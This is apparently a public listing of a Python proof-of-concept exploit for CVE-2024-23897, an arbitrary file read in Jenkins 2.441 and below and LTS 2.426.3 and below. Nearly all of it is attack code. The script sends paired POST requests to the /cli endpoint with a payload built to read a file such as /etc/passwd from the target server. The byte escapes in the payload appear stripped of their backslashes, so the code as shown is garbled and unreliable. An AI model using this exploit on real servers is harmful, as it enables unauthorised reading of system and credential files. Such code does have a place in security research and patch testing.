Authored by binganao | Site github.com

Jenkins versions 2.441 and below and LTS 2.426.3 and below remote arbitrary file read proof of concept exploit written in Python.

advisories | CVE-2024-23897

# python poc.py
# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]

import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
    exit()

data_bytes = b'x00x00x00x06x00x00x04helpx00x00x00x0ex00x00x0c@' + sys.argv[2].encode() + b'x00x00x00x05x02x00x03GBKx00x00x00x07x01x00x05zh_CNx00x00x00x00x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())

print(f'REQ: {data_bytes}n')

def req1():
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "download"
    })
    print(f'RESPONSE: {conn.getresponse().read()}')

def req2():
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "upload",
        "Content-type": "application/octet-stream"
    }, body=data_bytes)

t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)

t1.start()
time.sleep(0.1)
t2.start()

t1.join()
t2.join()

RELATED ARTICLESMORE FROM AUTHOR